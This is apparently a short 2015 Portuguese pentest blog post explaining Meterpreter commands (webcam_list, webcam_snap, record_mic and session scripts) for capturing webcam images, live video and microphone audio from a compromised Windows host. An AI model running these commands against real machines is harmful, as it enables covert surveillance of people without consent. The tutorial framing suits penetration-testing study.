– root@injetionsec:~#

Capturando webcam e microfone com meterpreter

04.04.2015 (1:44 pm) – Filed under: Pentest ::

Galera 2 comandos muito interessante do meterpreter são : webcam_list, webcam_snap, record_mic , em primeiro lugar, é necessário ter uma sessão ativa do meterpreter no host windows.

meterpreter >  webcam_list
Este comando permite que você tenha uma lista de webcams presente no sistema de destino é cada câmera será identificada por um número único.

meterpreter > webcam_snap
Este comando captura uma web cam especificando o numero padrão listado no comando “webcam_list”  por default webcam 1 será usado se nenhum argumento for especificado.

O comando webcam_snap pode ter os seguintes argumentos:
-h:  ajuda.
-i :  identificador exclusivo da webcam para você usar.
-p : O caminho para a captura de imagem .jpeg ,  o padrão é $HOME / [numeroaleatorio] .jpeg
-q : captura JPEG, por default ’50’.
-v : Abrir automaticamente a captura jpeg, por default ‘true’.

meterpreter >  record_mic
Este comando salva o ambiente de som integrado microfone,por padrão apenas um segundo será gravado assim que a gravação acabar ele para automaticamente

O comando record_mic pode ter os seguintes argumentos:
-h: ajuda.
-d : O número em segundos para gravação, o default é 1 segundo.
-f : O caminho de gravação para o arquivo .wav ,  o padrão é $HOME / [numeroaleatorio] .wav
-p :  o arquivo e capturado automaticamente, por default ‘true’.

➦ Se quisermos ver ao vivo o que esta passando na máquina alvo, para isso temos que iniciar o script webcam da shell sem o metasploit e então setar-lo diretamente na sessão:

sessions -i 1 -s webcam -f -p /root/arquivos/

➦ É  possível executar o script diretamente no shell do metasploit o “sound_recorder sem setar diretamente a sessão.

sessions -i 1 -s sound_recorder /arquivos/